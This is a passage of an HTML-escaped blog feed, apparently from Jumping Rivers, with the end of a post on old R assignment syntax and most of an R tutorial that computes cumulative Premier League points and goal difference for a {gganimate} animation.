&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;a_scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time10.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;instead of&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time10.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I can’t find when the &lt;code&gt;_&lt;/code&gt; operator was finally removed from R, I seem to recall around 2005.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Animating the Premier League using {gganimate}</title><link>https://www.jumpingrivers.com/blog/r-gganimate-premier-league/</link><pubDate>Sun, 02 Sep 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-gganimate-premier-league/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-gganimate-premier-league/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-gganimate-premier-league/original.gif " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ever wonder what an evolving gif of each premier league team’s goal difference vs points would look like made in R? Look no further! Most of this is going to be setting up the data (as always) instead of actually plotting the data. To get the data into shape, we&amp;rsquo;re going to be using the {tidyverse} and {lubridate}, which you can install the usual way via &lt;code&gt;install.packages()&lt;/code&gt;. To animate the data we&amp;rsquo;ll be using the {gganimate} package. This is not on CRAN and so must be installed from GitHub, which you can do so via the {devtools} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;thomasp85/gganimate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get started let’s attach the relevant packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gganimate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’re going to use the last full season of matches in the premier league, which was the 17/18 season. The data was sourced from &lt;a href="http://football-data.co.uk" rel="external"&gt;football-data.co.uk&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://www.football-data.co.uk/mmz4281/1718/E0.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 65&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Div Date HomeTeam AwayTeam FTHG FTAG FTR HTHG HTAG HTR Referee&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 E0 11/0… Arsenal Leicest… 4 3 H 2 2 D M Dean&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 E0 12/0… Brighton Man City 0 2 A 0 0 D M Oliv…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 E0 12/0… Chelsea Burnley 2 3 A 0 3 A C Paws…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 E0 12/0… Crystal… Hudders… 0 3 A 0 2 A J Moss&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 E0 12/0… Everton Stoke 1 0 H 1 0 H N Swar…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 E0 12/0… Southam… Swansea 0 0 D 0 0 D M Jones&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 54 more variables&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’re only interested in the date, teams, result and home/away goals. These variables come between the variables &lt;code&gt;Date&lt;/code&gt; and &lt;code&gt;FTR&lt;/code&gt;. We also need to convert &lt;code&gt;Date&lt;/code&gt; to a date object&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Date&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;FTR) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dmy&lt;/span&gt;(Date))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-r-gganimate-premier-league"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="cumulative-points-per-day-per-team"&gt;Cumulative points per day per team&lt;/h2&gt;
&lt;p&gt;There’s probably a better way to do this, but here is mine. I added a column for each team onto the data then, using a for loop (I know I’m sorry) I transferred the “H”, “A” and “D” status of the full time result into points for each time in their respective column. For you non-football heads, thats 3 for a win, 1 for a draw and 0 for a loss.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[sort&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam))] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt;(i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(prem)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTR[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;H&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTR[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i], prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i])] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 26&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date HomeTeam AwayTeam FTHG FTAG FTR Arsenal Bournemouth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal Leicest… 4 3 H 3 NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Brighton Man City 0 2 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-12 Chelsea Burnley 2 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-12 Crystal… Hudders… 0 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-12 Everton Stoke 1 0 H NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-12 Southam… Swansea 0 0 D NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 18 more variables&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can see where Arsenal beat Leicester 4-3, there is a 3 in the &lt;code&gt;Arsenal&lt;/code&gt; variable. Now, it would be nice to have this data in long form, for plotting purposes later, so we’ll use &lt;code&gt;gather()&lt;/code&gt;. I then don’t want any rows with an &lt;code&gt;NA&lt;/code&gt; in the &lt;code&gt;Points&lt;/code&gt; variable, as these only occur if a team hasn&amp;rsquo;t played on that day.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(Team, Points, Arsenal&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;`West Ham`) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Date, Team, Points) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(Points)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At the moment, we only have one row for each match on each day. Later, we’ll need to work out the position of each team on each day. To do this, we need the points for each team on each day, even if they didn’t play. So I’m going to create an empty data set of days and teams, join it then fill in the &lt;code&gt;NA&lt;/code&gt;’s with &lt;code&gt;0&lt;/code&gt;’s.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;empty &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(Date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Date), each &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; stringsAsFactors &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(empty, prem_points)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Joining, by = c(&amp;#34;Date&amp;#34;, &amp;#34;Team&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[is.na&lt;/span&gt;(prem_points)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now all we need to do is calculate the cumulative points for each team on each day over the course of the season&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Team) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cumsum&lt;/span&gt;(Points)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So, for example, for &lt;code&gt;Arsenal&lt;/code&gt;, the data now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arsenal&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 105 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date Team Points&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-13 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-19 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-20 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-21 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 2017-08-26 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 2017-08-27 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 2017-09-09 Arsenal 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 2017-09-10 Arsenal 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 95 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have a row for each day there was a premier league match, even if that team didn&amp;rsquo;t play. Here you can see Arsenal won on the first day of the season (they beat Leicester 4-3) and gather any more points til the won again on the 9th of September.&lt;/p&gt;
&lt;h2 id="cumulative-goal-difference-per-team-per-day"&gt;Cumulative goal difference per team per day&lt;/h2&gt;
&lt;p&gt;We’re going to take the exact same process to do this job. Do let’s start by overwriting those columns of points in &lt;code&gt;prem&lt;/code&gt; with columns of &lt;code&gt;NA&lt;/code&gt;’s ready for the goal difference&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[sort&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam))] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, using a for loop again (again, I’m sorry) for each home team and away team we calculate the goal difference by simply minusing the away team goals from the home team goals or vice versa.&lt;/p&gt;
